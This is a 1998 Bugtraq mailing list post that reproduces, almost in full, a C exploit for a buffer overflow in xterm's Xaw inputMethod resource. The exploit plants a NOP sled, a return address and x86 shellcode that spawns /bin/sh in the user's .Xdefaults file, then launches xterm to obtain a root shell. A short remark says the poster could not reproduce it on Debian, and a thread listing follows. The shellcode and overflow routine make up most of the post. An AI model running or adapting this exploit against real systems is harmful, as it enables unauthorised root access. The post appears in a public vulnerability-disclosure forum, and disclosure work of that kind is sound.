Bugtraq mailing list archives
xterm exploit [TOG issue]
From: arcangeli () MBOX QUEEN IT (Andrea Arcangeli)
Date: Fri, 8 May 1998 16:50:05 +0200
/* xterm_exp.c : linux/x86 xterm.Xaw exploit by alcuin - 5/4/98 - [ http://www.rootshell.com/ ] It works against both Xaw and neXtaw widgets NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again. */ #include <stdlib.h> #include <stdio.h> #include <ctype.h> unsigned int getsp() { asm("mov %esp,%eax"); } inline rootshell(){ __asm__( "movb $0x56, %al\n\t" "l1:cmpb $0x12, %al\n\t" "je l2\n\t" "movb $0x12,%al\n\t" "call l1\n\t" "l2:pop %esi\n\t" "xorl %eax,%eax\n\t" "movb $0x25, %al\n\t" "addl %eax,%esi\n\t" "movl %esi,%ebx\n\t" "movl %esi,%edi\n\t" "movb $8,%al\n\t" "addl %eax,%edi\n\t" "movb $5,%al\n\t" "addl %eax,%esi\n\t" "movl %esi,(%edi)\n\t" "movl %edi,%ecx\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "incl %edi\n\t" "xorb %al,%al\n\t" "movl %eax,(%edi)\n\t" "movl %edi,%edx\n\t" "movb $0xb,%al\n\t" "int $0x80\n\t" ".string \"/bin/sh\"\n" ); } #define CONFFILE ".Xdefaults" #define OLDFILE ".Xdefaults.old" #define NEWFILE ".Xdefaults.new" main (int argc, char **argv) { char *home; FILE *f_in, *f_out; char buf[16384]; char shellbuf[16384]; char *s; int i; unsigned int sp=getsp(); if (home = getenv("HOME")) chdir(home); if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); } if (f_in = fopen(CONFFILE, "r")) { fseek(f_in,0,SEEK_SET); while (!feof(f_in)) { fgets(buf,16384,f_in); for (s=buf;isblank(*s);s++); if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out); } fclose(f_in); } /* fill the buffer with nops */ memset(shellbuf, 0x90, sizeof(shellbuf)); shellbuf[sizeof(shellbuf)-1] = 0; /* write the return adress */ s = shellbuf+2052; *(int *)s=sp+0x69F5; /* write the root shell code */ s = shellbuf+2800; strcpy(s,(char*)rootshell); fputs("xterm*inputMethod:",f_out); fputs(shellbuf, f_out); fclose(f_out); system("/bin/cp "CONFFILE" "OLDFILE); system("/bin/mv -f "NEWFILE" "CONFFILE); execl("/usr/X11R6/bin/xterm","xterm",NULL); } I can' t reproduce the problem with the latest Debian compiled XFree86: andrea@dragon:~$ dpkg -l xbase Desired=Unknown/Install/Remove/Purge | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad) ||/ Name Version Description +++-===============-==============-============================================ ii xbase 3.3.2-4 local clients and configuration required by Andrea[s] Arcangeli
Current thread:
- Re: 3Com switches - undocumented access level., (continued)
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Jean-Francois Malouin (May 06)
- Re: 3Com switches - undocumented access level. Riku Meskanen (May 07)
- dip 3.3.7 exploit jamez (May 07)
- dip-3.3.7o exploit zef (May 07)
- Re: 3Com switches - undocumented access level. Eric Monti (May 07)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- NSCA HTTPD (for Windows) bug. Renos (May 08)
- 4 Advisories for Digital Unix: ftp, advs, rpc.statd, ftpd Helmut Springer (May 08)
- xterm exploit [TOG issue] Andrea Arcangeli (May 08)
- BSDI 3.1/Squid Default Owner Jonathan A. Zdziarski (May 07)
- Re: 3Com switches - undocumented access level. Durval Menezes (May 06)
- Re: 3Com switches - undocumented access level. Toh Chang Ying (May 08)
- Re: 3Com switches - undocumented access level. Aleph One (May 08)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level.) Joao Carlos Mendes Luis (May 10)
- Re: 3Com switches - undocumented access level.) Riku Meskanen (May 09)
- Re: 3Com switches - undocumented access level. der Mouse (May 08)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- Re: 3Com switches - undocumented access level. Sasha Egan (May 08)
- Re: 3Com switches - undocumented access level. Michael Mittelstadt (May 10)